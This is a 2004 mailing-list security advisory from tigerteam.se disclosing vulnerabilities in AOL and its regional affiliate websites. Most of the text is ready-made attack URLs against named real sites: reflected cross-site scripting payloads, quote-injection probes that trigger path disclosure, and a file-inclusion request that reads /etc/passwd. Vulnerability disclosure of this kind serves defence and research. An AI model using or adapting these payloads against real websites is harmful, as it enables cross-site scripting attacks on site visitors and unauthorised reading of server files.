[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200412261858.57218.michel.blomgren@tigerteam.se>
Date: Sun, 26 Dec 2004 18:58:57 +0100
From: Michel Blomgren <michel.blomgren@...erteam.se>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Multiple vulnerabilities in AOL and AOL affiliate
web sites
tigerteam.se security advisory - TSEAD-200412-2
www.tigerteam.se
Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
Date: Sat Dec 18 15:47:40 EST 2004
Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
vulnerabilities
Reference: TSEAD-200412-2
Author: Xavier de Leon <xavier@...erteam.se>
SYNOPSIS
http://www.corp.aol.com/whoweare/mission.shtml
VULNERABILITY
The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.
COMMENT
I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.
DISCOVERY
Xavier de Leon <xavier@...erteam.se>
EXPLOITATION
1) Description: multiple XSS attacks in "report.adp" script:
Attack: a)
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
b)
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
c)
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
d)
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
e)
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>
2) Description: XSS attack in help_faq/starting_out's "index.asp" script:
Attack: a)
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>
3) Description: XSS attack in "catId" variables on multiple .adp scripts:
Attack: a)
http://help.channels.aol.com/article.adp?catId="><script>alert("fubar")</script>&articleId=0
b)
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0
4) Description: Input validation attacks and path disclosure in "file_id"
variable over multiple scripts:
Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
b) http://downloads.aol.com.br/arquivo.php?file_id=(
5) Description: Input validation attacks and path disclosure in
"busca_resultado.php" script:
Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string='
6) Description: Input validation attacks and path disclosure in
"subcategoria.php" script:
Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id='
7) Description: Path disclosure in "wa" script, part of listserv package.
Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1
8) Description: XSS attack in "main_redesign.adp" script:
Attack: a)
http://aimtoday.aol.com/features/main_redesign.adp?fid="><script>alert("fubar")</script>
9) Description: XSS attack in "price_plan.adp" script:
Attack: a)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand="><script>alert("fubar")</script>
b)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo="><script>alert("fubar")</script>&brand=
10) Description: XSS and Path disclosure attack in "object.adp" script:
Attack: a)
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
b)
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
c)
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
11) Description: Path disclosures in multiple aol.com.ar scripts:
Attack: a) http://foros.aol.com.ar/foro.php3?id_foro='
b) http://foros.aol.com.ar/toplevel.php3?id_top='
c) http://foros.aol.com.ar/categorias.php3?id_cat='
d) http://foros.aol.com.ar/subcategoria.php3?id_subcat='
12) Description: XSS attacks in "zonalibre.adp" script:
Attack: a)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id="><script>alert("fubar")</script><!---
b)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=<script>alert("fubar")</script>&Id=
13) Description: XSS attacks in "computacion.adp" script:
Attack: a)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=<script>alert("fubar")</script>&ID=
b)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID="><script>alert("fubar")</script><!---
14) Description: XSS attack in "aolenvivo.adp" script:
Attack: a)
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=<script>alert("fubar")</script>&ID=
15) Description: XSS attack in "noticias.adp" script:
Attack: a)
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=<script>alert("fubar")</script>&Id=
16) Description: XSS attack in "musica.adp" script:
Attack: a)
http://aol.com.ar/CanalesWeb/musica.adp?Canal=<script>alert("fubar")</script>&Id=
17) Description: XSS attack in "deportes.adp" script:
Attack: a)
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=<script>alert("fubar")</script>&ID=
18) Description: XSS attack in "entretenimientos.adp" script:
Attack: a)
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=<script>alert("fubar")</script>&ID=
19) Description: System file read access vulnerability in "index.adp" script:
Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd
20) Description: Path disclosure and XSS attack in "holidaydetails.asp"
script:
Attack: a)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId='
Attack: b)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId="><script>alert("fubar")</script><!---
21) Description: Path disclosure attacks in "flightreturnsearch.asp" script:
Attack: a)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month='
b)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month='
ACKNOWLEDGMENTS
I would like to thank the following people in no particular order:
Michel + all my brothers in p-e and uDc, you know who you are.
ABOUT TIGERTEAM.SE
tigerteam.se offers spearhead competence within the areas of vulnerability
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists